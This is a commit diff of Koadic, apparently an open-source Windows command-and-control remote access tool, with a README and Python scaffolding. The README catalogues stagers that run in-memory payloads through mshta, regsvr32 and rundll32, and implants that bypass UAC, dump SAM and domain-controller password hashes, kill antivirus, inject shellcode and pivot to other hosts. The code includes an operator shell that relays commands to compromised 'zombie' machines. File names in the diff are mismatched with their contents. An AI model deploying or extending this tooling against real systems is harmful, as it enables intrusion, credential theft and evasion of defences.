initial commit

Author: zerosum0x0

LICENSE

@@ -1,2 +1,49 @@
-# koadic
-Koadic C3 COM Command & Control - JScript RAT
+# Koadic
+Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.
+
+It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).
+
+Koadic also attempts to be compatible with both Python 2 and Python 3.
+
+### Demo
+
+[![Koadic Demo](http://img.youtube.com/vi/hLdXp2WPvTs/0.jpg)](http://www.youtube.com/watch?v=hLdXp2WPvTs "Koadic Demo")
+
+1. Hooks a zombie
+2. Elevates integrity (UAC Bypass)
+3. Dumps SAM/SECURITY hive for passwords
+4. Scans local network for open SMB
+5. Pivots to another machine
+
+### Stagers
+Stagers hook target zombies and allow you to use implants.
+
+Module | Description
+--------|------------
+stager/js/mshta | serves payloads in memory using MSHTA.exe HTML Applications
+stager/js/regsvr | serves payloads in memory using regsvr32.exe COM+ scriptlets
+stager/js/rundll32_js | serves payloads in memory using rundll32.exe
+stager/js/disk | serves payloads using files on disk
+
+### Implants
+Implants start jobs on zombies.
+
+Module | Description
+--------|------------
+implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
+implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
+implant/fun/thunderstruck | Maxes volume and opens a URL in a hidden window (AC/DC YouTube).
+implant/fun/voice | Plays a message over text-to-speech.
+implant/gather/clipboard | Retrieves the current content of the user clipboard.
+implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive.
+implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file.
+implant/inject/reflectdll_excel | Injects a reflective-loaded DLL (if Excel is installed).
+implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed).
+implant/manage/enable_rdesktop | Enables remote desktop on the target.
+implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output.
+implant/manage/killav | iterate known antivirus processes, and attempt to end their execution.
+implant/pivot/exec_wmi | Run a command on another machine using WMI.
+implant/pivot/exec_psexec | Run a command on another machine using psexec.
+implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN.
+implant/utils/download_file | Downloads a file from the target zombie.
+implant/utils/upload_file | Uploads a file from the listening server to the target zombies.

README.md

@@ -0,0 +1,111 @@
+# Parts of this file are:
+# Copyright (c) 2007 Brandon Sterne
+# 2015 Updates by Rafe Colburn
+# Licensed under the MIT license.
+# http://brandon.sternefamily.net/files/mit-license.txt
+# CIDR Block Converter - 2007
+
+def ip2bin(ip):
+    b = ""
+    inQuads = ip.split(".")
+    outQuads = 4
+    for q in inQuads:
+        if q != "":
+            b += dec2bin(int(q),8)
+            outQuads -= 1
+    while outQuads > 0:
+        b += "00000000"
+        outQuads -= 1
+    return b
+
+def dec2bin(n,d=None):
+    s = ""
+    while n>0:
+        if n&1:
+            s = "1"+s
+        else:
+            s = "0"+s
+        n >>= 1
+    if d is not None:
+        while len(s)<d:
+            s = "0"+s
+    if s == "": s = "0"
+    return s
+
+def bin2ip(b):
+    ip = ""
+    for i in range(0,len(b),8):
+        ip += str(int(b[i:i+8],2))+"."
+    return ip[:-1]
+
+def parse_cidr(str):
+    splitted = str.split("/")
+
+    if len(splitted) > 2:
+        raise ValueError
+
+    if len(splitted) == 1:
+        subnet = 32
+    else:
+        subnet = int(splitted[1])
+
+    if subnet > 32:
+        raise ValueError
+
+    str_ip = splitted[0]
+    ip = str_ip.split(".")
+    if len(ip) != 4:
+        raise ValueError
+
+    for i in ip:
+        if int(i) < 0 or int(i) > 255:
+            raise ValueError
+
+    if subnet == 32:
+        return [str_ip]
+
+    bin_ip = ip2bin(str_ip)
+
+    ip_prefix = bin_ip[:-(32-subnet)]
+
+    ret = []
+    for i in range(2**(32-subnet)):
+        ret.append(bin2ip(ip_prefix+dec2bin(i, (32-subnet))))
+
+    return ret
+
+def get_ports(str):
+    ports = []
+    for x in str.split(","):
+        x = x.strip()
+        if "-" in x:
+            x = x.split("-")
+            if len(x) > 2:
+                raise ValueError
+
+            if int(x[0]) < 0 or int(x[0]) > 65535:
+                raise ValueError
+            if int(x[1]) < 0 or int(x[1]) + 1 > 65535:
+                raise ValueError
+            if int(x[0]) > int(x[1]) + 1:
+                raise ValueError
+
+            ports += range(int(x[0]), int(x[1]) + 1)
+        else:
+            if int(x) < 0 or int(x) > 65535:
+                raise ValueError
+            ports.append(int(x))
+
+    return ports
+
+def get_ips(str):
+    ips = []
+    for x in str.split(","):
+        ips += parse_cidr(x.strip())
+    return ips
+
+if __name__ == "__main__":
+    ips = get_ips("127.0.0.1,192.168.0.0/24,10.0.0.40/28")
+    print(ips)
+    ports = get_ports("4444,1-100,5432")
+    print(ports)

core/__init__.py

@@ -0,0 +1,49 @@
+class Colors(object):
+    def __init__(self):
+        # http://ozzmaker.com/add-colour-to-text-in-python/
+        self.ENDC = '\033[0m'
+
+        self.RED = '31'
+        self.GREEN = '32'
+        self.YELLOW = '33'
+        self.BLUE = '34'
+        self.CYAN = '36'
+
+        self.NORMAL = '0'
+        self.BOLD = '1'
+        self.UNDERLINE = '2'
+
+    def error(self, text):
+        return self.colorize(text, [self.RED, self.BOLD])
+
+    def warning(self, text):
+        return self.colorize(text, [self.YELLOW, self.BOLD])
+
+    def good(self, text):
+        return self.colorize(text, [self.GREEN, self.BOLD])
+
+    def status(self, text):
+        return self.colorize(text, [self.BLUE, self.BOLD])
+
+    def colorize(self, text, options, readline=False):
+        start = ""
+        if readline:
+            start += "\001"
+        start += '\033['
+        start += ";".join(options)
+        start += "m"
+        if readline:
+            start += "\002"
+            end = "\001" + self.ENDC + "\002"
+        else:
+            end = self.ENDC
+
+        return start + text + end
+
+    def get_prompt(self, state, isreadline = True):
+        import os
+        glyph = "#" if os.geteuid() == 0 else "$"
+        return "%s%s: %s%s" % (self.colorize("(", [self.GREEN], isreadline),
+                                 self.colorize("koadic", [self.BOLD], isreadline),
+                                 self.colorize(state, [self.CYAN], isreadline),
+                                 self.colorize(")" + glyph + " ", [self.GREEN], isreadline))

core/cidr.py

@@ -0,0 +1,88 @@
+DESCRIPTION = "command shell to interact with a zombie"
+
+def autocomplete(shell, line, text, state):
+    if len(line.split(" ")) >= 2:
+        return None
+
+    options = []
+
+    for server in shell.stagers:
+        for session in server.sessions:
+            options.append(str(session.id))
+
+    try:
+        return options[state]
+    except:
+        return None
+
+def help(shell):
+    pass
+
+def get_prompt(shell, id, ip, isreadline = True):
+        return "%s%s: %s%s" % (shell.colors.colorize("[", [shell.colors.NORMAL], isreadline),
+                                 shell.colors.colorize("koadic", [shell.colors.BOLD], isreadline),
+                                 shell.colors.colorize("ZOMBIE %s (%s)" % (id, ip), [shell.colors.CYAN], isreadline),
+                                 shell.colors.colorize(" - cmd.exe]> ", [shell.colors.NORMAL], isreadline))
+
+def run_cmdshell(shell, session):
+    import copy
+
+    exec_cmd_name = 'implant/manage/exec_cmd'
+    # this won't work, Error: "can't pickle module objects"
+    #plugin = copy.deepcopy(shell.plugins['implant/manage/exec_cmd'])
+    plugin = shell.plugins[exec_cmd_name]
+
+    # copy (hacky shit)
+    old_prompt = shell.prompt
+    old_clean_prompt = shell.clean_prompt
+    old_state = shell.state
+
+    old_zombie = plugin.options.get("ZOMBIE")
+    old_cmd = plugin.options.get("CMD")
+
+    id = str(session.id)
+    ip = session.ip
+
+    while True:
+        shell.state = exec_cmd_name
+        shell.prompt = get_prompt(shell, id, ip, True)
+        shell.clean_prompt = get_prompt(shell, id, ip, False)
+        plugin.options.set("ZOMBIE", id)
+
+        try:
+            import readline
+            readline.set_completer(None)
+            cmd = shell.get_command(shell.prompt)
+
+            if len(cmd) > 0:
+                if cmd == 'exit':
+                    return
+
+                plugin.options.set("CMD", cmd)
+                plugin.run()
+        except KeyboardInterrupt:
+            shell.print_plain(shell.prompt)
+            return
+        finally:
+            plugin.options.set("ZOMBIE", old_zombie)
+            plugin.options.set("cmd", old_cmd)
+
+            shell.prompt = old_prompt
+            shell.clean_prompt = old_clean_prompt
+            shell.state = old_state
+
+
+def execute(shell, cmd):
+    splitted = cmd.split(" ")
+    if len(splitted) >= 2:
+        target = splitted[1]
+
+        for server in shell.stagers:
+            for session in server.sessions:
+                if target == str(session.id):
+                    run_cmdshell(shell, session)
+                    return
+
+        shell.print_error("Zombie #%s not found." % (target))
+    else:
+        shell.print_error("You must provide a zombie number as an argument.")

core/colors.py

@@ -0,0 +1,11 @@
+DESCRIPTION = "exits the program"
+
+def autocomplete(shell, line, text, state):
+    return None
+
+def help(shell):
+    pass
+
+def execute(shell, cmd):
+    import sys
+    sys.exit(0)

core/commands/__init__.py

@@ -0,0 +1,55 @@
+DESCRIPTION = "displays help info for a command"
+
+
+def autocomplete(shell, line, text, state):
+
+    # should never go this big...
+    if len(line.split(" ")) >= 3:
+        return None
+
+    options = [x + " " for x in shell.actions.keys() if x.startswith(text)]
+
+    try:
+        return options[state]
+    except:
+        return None
+
+
+def help(shell):
+    shell.print_plain("")
+    shell.print_plain("You definitely need help")
+    shell.print_plain("")
+
+def execute(shell, cmd):
+
+    splitted = cmd.split(" ")
+
+    if len(splitted) == 1:
+        return help_all(shell)
+
+    if len(splitted) >= 2:
+        return help_command(shell, splitted[1])
+
+
+def help_command(shell, command):
+    if command not in shell.actions:
+        shell.print_error("No command named %s" % command)
+        return
+
+    shell.actions[command].help(shell)
+
+
+def help_all(shell):
+    formats = '\t{0:<12}{1:<16}'
+
+    shell.print_plain("")
+    shell.print_plain(formats.format("COMMAND", "DESCRIPTION"))
+    shell.print_plain(formats.format("---------", "-------------"))
+
+    for key, env in shell.actions.items():
+        shell.print_plain(formats.format(key, env.DESCRIPTION))
+
+    shell.print_plain("")
+    shell.print_plain('Use "help %s" to find more info about a command.' %
+                      shell.colors.colorize("command", [shell.colors.BOLD]))
+    shell.print_plain("")